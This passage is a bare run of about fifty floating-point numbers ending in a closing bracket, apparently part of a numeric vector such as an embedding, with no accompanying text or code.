-0.05542869120836258, -0.020080266520380974, 0.009416041895747185, -0.0233675055205822, -0.057535383850336075, 0.11500196158885956, -0.021712781861424446, 0.05165759474039078, 0.0328575074672699, 0.10633859783411026, -0.02924664132297039, -0.03187127411365509, 0.07265184074640274, -0.011433177627623081, -0.015289059840142727, 0.11440543085336685, -0.016330327838659286, 0.036185432225465775, -0.004088344052433968, 0.0068389540538191795, 0.0762762501835823, -0.014269063249230385, -0.04600828140974045, 0.036267224699258804, 0.0595332570374012, 0.022438952699303627, 0.009606316685676575, -0.025922242552042007, -0.06366422772407532, -0.031826213002204895, 0.019423792138695717, 0.054095637053251266, 0.041478849947452545, 0.011697200126945972, -0.09909714013338089, 0.10475031286478043, 0.07593736797571182, -0.04149232059717178, 0.04961448535323143, -0.004073749762028456, 0.02436036989092827, 0.04720206931233406, -0.020746644586324692, -0.04693468287587166, -0.0515923798084259, 0.018005238845944405, -0.0928092822432518, -0.054857511073350906, 0.09342987090349197, -0.08580414205789566, -0.015654776245355606, 0.061513811349868774 ]